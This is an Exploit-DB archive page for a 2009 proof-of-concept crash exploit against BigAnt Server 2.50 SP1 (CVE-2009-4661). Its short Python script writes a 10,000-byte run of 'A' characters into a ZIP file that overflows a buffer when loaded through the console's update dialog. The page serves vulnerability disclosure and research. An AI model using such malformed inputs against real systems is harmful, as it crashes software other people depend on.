BigAnt Server 2.50 SP1 (ZIP File) Local Buffer Overflow PoC



EDB-ID: 9695 CVE: 2009-4661OSVDB-ID: 62601
Author: Dr_IDEPublished: 2009-09-16Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
#!/usr/bin/env python
#######################################################################
#
# BigAnt Server 2.50 SP1 Local Buffer Overflow PoC
# Found By: 	Dr_IDE
# Tested:   	XPSP3
# Usage:	Open BigAnt Console, Go to Update, Browse to zip, Boom.
#
#######################################################################
buff = ("\x41" * 10000)
f1 = open("BigAntUpdate.zip","w")
f1.write(buff)
f1.close()
# milw0rm.com [2009-09-16]






Comments

No comments so far